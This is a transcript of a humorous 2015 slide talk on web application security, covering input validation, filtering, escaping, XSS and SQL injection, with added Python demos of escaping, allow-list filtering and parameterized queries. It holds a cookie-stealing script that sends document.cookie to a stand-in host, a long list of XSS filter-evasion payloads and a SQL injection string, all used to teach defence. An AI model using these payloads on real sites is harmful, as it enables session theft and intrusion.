Basic Web Application Security. User Input Kick Your Arse.
Posted 22-Dec-2015. Category: Documents.
Basic Web Application Security
User Input
Kick Your Arse
Three Ways (All Awesome)
Validation
Passive (No touchy-touchy)
This is a Number.
2
This is not a Number.
a
This is really not a Number.
<script>alert('loldongs')</script>
Filtering
Destructive (One-Way Street)
Only letting the good stuff in.
or
Keeping out the bad stuff.
What's the diff? (Bro.)
Both can be error-prone...
What happens when you screw it up?
White-Listing: Usability Problems.
Black-Listing: Security Problems.
(Always a trade-off.)
Escaping
Transport: Point A to Point B.
Data will be the same on both sides.
Different Media, Different Escaping
HTML
<b>Huh.</b>
<p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p>
<b>Huh.</b>
(Middle line shown with its entities; the transcript had decoded them.)
SQL
Sam O'Brien
INSERT INTO mah_peeps (name) VALUES ('Sam O\'Brien');
1, Sam O'Brien, 2010-09-02 18:30:00
XSS (Cross-Site Scripting)
(XTREME Site Scripting)
Sticking Scripts Where They Don't Belong.
You there, down the back. Stop sniggering.
<script>alert('HACKED BY LOLDONGS')</script>
Amateurs!
<script>alert(document.cookie)</script>
Hmm.
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>
Oh shit.
Why is this uncool?
(Yeah! Why?)
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>
Ooooh shit.
Oooooooooooh shit.
Oooooooooooooooooh shit.
Why is this really uncool?
(Because shut up.)
HTTP
Hyper-Text Thingy I-forgot-again
Stateless
No Idea Who You Are.
It can guess. (Badly.)
IP Address, Browser User-Agent
Sends a cookie with each request.
(A basket of goodies that the browser sends faithfully every
request.)
The Server puts a unique ID in the basket.
PHPSESSID=123your456mum789; __utma=12948.23.4211414.5553; is_a_furry=1
Browser sends the ID every
request.
PHPSESSID=123your456mum789
<script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script>
Look again.
THEY HAVE YOUR COOKIE.
(Setting HttpOnly on the session cookie keeps it out of document.cookie. It does nothing about what the injected script can do next; the later slides cover that.)
Ooooooooooooooooooooooo-
Preventing Shenanigans
HTML Validation: Really Hard.
HTML Filtering: Still Really Hard.
Use a library, e.g. HTML Purifier.
HTML Escaping: Dead Easy.
Most languages have stuff to handle this, e.g. htmlentities(), cgi.escape(), CGI.escape().
(Check the defaults, though: cgi.escape() left quotes alone unless you passed quote=True, and was removed in Python 3.8 in favour of html.escape(); PHP's htmlentities() before 8.1 leaves single quotes alone unless you pass ENT_QUOTES. And escape for the context the data lands in: a text node, an attribute value, a URL and a script block each need different treatment.)
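Escaping in practice, as an added example in Python that is not part of the original slides. html.escape() stands in for the cgi.escape() named above; the profile page, its input field and the attribute-breakout string are constructed for the demo, while the other two inputs are the slide's own.

```python
# Added example, not from the original slides. Escaping is easy; matching it
# to the context the data lands in is the part people get wrong.
import html

# Constructed inputs: the two strings from the validation slide, plus one
# aimed at a double-quoted attribute value rather than a text node.
LOLDONGS = "<script>alert('loldongs')</script>"
HUH = "<b>Huh.</b>"
BREAKOUT = '" autofocus onfocus="alert(1)'


def escape_text(data):
    """Escape for HTML: & < > and both quote characters become entities."""
    return html.escape(data, quote=True)


def escape_like_old_cgi(data):
    """What cgi.escape() did by default: & < > only, quotes untouched.
    (cgi.escape() was removed in Python 3.8; html.escape() replaced it.)"""
    return html.escape(data, quote=False)


def render_profile(name, escaper):
    """Hypothetical profile page: untrusted `name` lands in a text node
    AND inside a double-quoted attribute, escaped the same way in both."""
    safe = escaper(name)
    return '<p>User: %s</p><input name="who" value="%s">' % (safe, safe)


def attribute_escaped(page):
    """True if the untrusted value stayed inside value="...": the only
    double quotes left are the four the template itself put there."""
    return page.count('"') == 4  # name="who" and value="..."


def round_trip(data):
    """Point A to Point B: escape for the HTML medium, decode on arrival,
    and the data is the same on both sides."""
    return html.unescape(escape_text(data))


if __name__ == "__main__":
    for name in (LOLDONGS, HUH, BREAKOUT):
        print(render_profile(name, escape_text))
        print(render_profile(name, escape_like_old_cgi))
```

With the old quote-less default, BREAKOUT renders as `value="" autofocus onfocus="alert(1)"`: no `<script>` anywhere, and the page still runs attacker code.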
How hard is filtering?
(It’s just <script>, right?)
THIS HARD.
<IMG SRC=javascript:alert('a')>
<img src=javascript:alert("a")>
<img """><script>alert('a')</script>">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>
(Entity-encoded javascript:alert('XSS'); the transcript had decoded most of the entities, so the decimal and hex forms are restored here as a best guess.)
<IMG SRC="jav	ascript:alert('a');"> (embedded tab)
(Well, then.)
<IMG SRC="jav&#x09;ascript:alert('XSS');"> (encoded tab, assumed; the transcript had decoded it)
<IMG SRC="jav
ascript:alert('XSS');">
<SCR\0IPT>alert('a')</SCR\0IPT>
<SCRIPT/a SRC="http://foo/x.js"></SCRIPT>
<img onmouseover!#$%&=alert('a')>
<<SCRIPT>alert("a");//<</SCRIPT>
<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>
<SC\0RIPT SRC=http://foo/x.js?<B>
<script src=//foo/x.js>
<img src="javascript:alert('a')"
THIS HARD.
<iframe src=http://foo/x.html <
<body background="javascript:alert('a')">
<BODY ONLOAD=alert('a')>
<img dynsrc="javascript:alert('a')">
<img lowsrc="javascript:alert('a')">
<BGSOUND SRC=javascript:alert('a')>
<BR SIZE="&{alert('a')}">
<LAYER SRC="http://foo/x.html"></LAYER>
<link rel="stylesheet" href="javascript:alert('a');">
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>BODY{-moz-binding:url("http://foo/
x.xml#xss")}</STYLE>
(Well, then.)
<IMG SRC='vbscript:msgbox("a")'>
<img src="livescript:alert('a')">
¼script¾alert(¢XSS¢)¼/script¾ (US-ASCII encoding evasion)
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('a');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
THIS HARD.
<DIV STYLE="background-image: url(javascript:alert('a'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('a'));">
<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('a'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("a"))'>
<STYLE TYPE="text/javascript">alert('a');</STYLE>
(Well, then.)
<STYLE>.x{background-image:url("javascript:alert('a')");}</STYLE><A CLASS=X></A>
<BASE HREF="javascript:alert('a');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://foo/x.html"></OBJECT>
<EMBED SRC="http://foo/xss.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd....jwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
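As an added example that is not part of the original slides: a black-list that "just strips <script>" run against four payloads copied from the list above, beside a toy allow-list built on Python's stdlib html.parser. The allowed tag set (b, i, p) and the clean sample post are assumptions for the demo; HTML Purifier, which the slides recommend, is what you would actually deploy.

```python
# Added example, not from the original slides. Black-list versus allow-list,
# against the slide's own payloads. The allow-list is a toy, not a replacement
# for HTML Purifier; it shows the shape of "only letting the good stuff in".
import html
import re
from html.parser import HTMLParser

# Constructed inputs: payloads copied from the slide, plus one clean post.
PAYLOADS = [
    "<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>",
    "<SCR\0IPT>alert('a')</SCR\0IPT>",
    "<BODY ONLOAD=alert('a')>",
    "<a href=\"jav\tascript:alert('a')\">click</a>",
]
CLEAN = "<p><b>Huh.</b> &amp; <i>fine</i></p>"

# Tags a post may contain (assumed set). No attributes, ever: that single
# rule kills onload=, href="javascript:" and style= in one move.
ALLOWED = {"b", "i", "p"}


def strip_script_tags(data):
    """Black-list: remove every <script ...> and </script>, any case."""
    return re.sub(r"(?i)</?script[^>]*>", "", data)


class AllowListFilter(HTMLParser):
    """Rebuild the fragment from parsed tokens, keeping only ALLOWED tags."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED:                 # tag names arrive lower-cased
            self.out.append("<%s>" % tag)  # attrs dropped unconditionally

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))  # text stays text
    # Comments, doctypes and processing instructions fall through to the
    # base class handlers, which do nothing, so they are dropped.


def allow_list_filter(data):
    """Only ALLOWED tags and escaped text can ever reach the output."""
    p = AllowListFilter()
    p.feed(data)
    p.close()
    return "".join(p.out)


def disallowed_markup(fragment):
    """Every '<' that does not open an ALLOWED tag. Empty list == clean."""
    return re.findall(r"(?i)<(?!/?(?:b|i|p)>)[^>]*>?", fragment)


if __name__ == "__main__":
    for p in PAYLOADS:
        print("black-list :", repr(strip_script_tags(p)))
        print("allow-list :", repr(allow_list_filter(p)))
```

Stripping `<SCRIPT>` out of the first payload leaves behind a perfectly good `<SCRIPT>`, and the other three never contained the string at all. The allow-list never has to know what the bad stuff looks like: anything it did not explicitly parse as b, i or p is either escaped or gone.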
One more thing about XSS.
(Groan.)
Remember <script>alert()</script>
?
(Yes, I do. Shut up.)
alert() can be ANY JAVASCRIPT.
(Yes, and...?)
Do you have any forms on your page?
(Yes.)
Do you have any javascript functions your site uses to do anything useful?
(... Yes.)
Does your site make any AJAX calls to do anything useful?
(... Oh.)
That injected code can trigger forms, run
javascript functions, or make AJAX calls.
(... Oooooh.)
Send someone to a link that looks like:
http://my.site/?user=<script>doStuff();</script>
(... Oooooooooh.)
Or store something that will output this on someone’s profile
page:
<script>doStuff();</script>
(... Oooooooooooooooh.)
... And you’re hosed.
(Shit.)
The Human Element
Touchy-Feely Commie Bullshit.
We are very fallible.
We will forget things.
When time gets short, we take the easy path.
Design systems so that they naturally
encourage security.
SQL
insert("INSERT INTO posts VALUES ('".sql_safe($title)."', '".sql_safe($content)."', '".sql_safe($author)."')");
or
insert("INSERT INTO posts VALUES (:title, :content, :author)", $title, $content, $author);
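The two insert styles above, and the Sam O'Brien row from the SQL escaping slide, run for real as an added example in Python (not code from the original slides). The posts table columns come from the slide; an in-memory SQLite database, TEXT column types and the crafted author string are assumptions for the demo, and the slide's insert()/sql_safe() helpers are not defined on the page, so plain string building stands in for the "forgot to call sql_safe()" case.

```python
# Added example, not from the original slides. Both insert styles from the
# slide, run against an in-memory SQLite database (assumed for the demo).
import sqlite3

# Constructed inputs.
OBRIEN = "Sam O'Brien"
EVIL_AUTHOR = "x'), ('pwned', 'pwned', 'attacker"  # closes our row, opens another


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (title TEXT, content TEXT, author TEXT)")
    return conn


def insert_concat(conn, title, content, author):
    """First slide, minus the sql_safe() someone forgot: data glued into SQL."""
    sql = "INSERT INTO posts VALUES ('%s', '%s', '%s')" % (title, content, author)
    conn.execute(sql)


def insert_param(conn, title, content, author):
    """Second slide: placeholders; the driver keeps data and SQL apart."""
    conn.execute("INSERT INTO posts VALUES (:title, :content, :author)",
                 {"title": title, "content": content, "author": author})


def authors(conn):
    return [row[0] for row in conn.execute("SELECT author FROM posts ORDER BY rowid")]


def demo():
    """Returns what each style did with the same two author strings."""
    results = {}
    conn = make_db()
    try:                       # O'Brien's apostrophe ends the string early
        insert_concat(conn, "Hello", "First post", OBRIEN)
        results["concat_obrien"] = "inserted"
    except sqlite3.OperationalError:
        results["concat_obrien"] = "syntax error"
    insert_concat(conn, "Hello", "First post", EVIL_AUTHOR)
    results["concat_rows"] = authors(conn)       # a row nobody wrote

    conn = make_db()
    insert_param(conn, "Hello", "First post", OBRIEN)
    insert_param(conn, "Hello", "First post", EVIL_AUTHOR)
    results["param_rows"] = authors(conn)        # both stored verbatim
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

sql_safe() would have handled O'Brien too; the point of the placeholders is that nobody has to remember to call it, which is the whole "human element" argument.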
HTML
<h3><%= title %> - <%= date %></h3><div><%= raw(post_body) %></div><p>Written by <%= author %></p>
or
<h3><?=htmlentities($title);?> - <?=htmlentities($date);?></h3><div><?=$post_body;?></div><p>Written by <?=htmlentities($author);?></p>
(The first escapes everything unless you say raw(); the second escapes only where someone remembered to type htmlentities().)
Questions?
Now get out.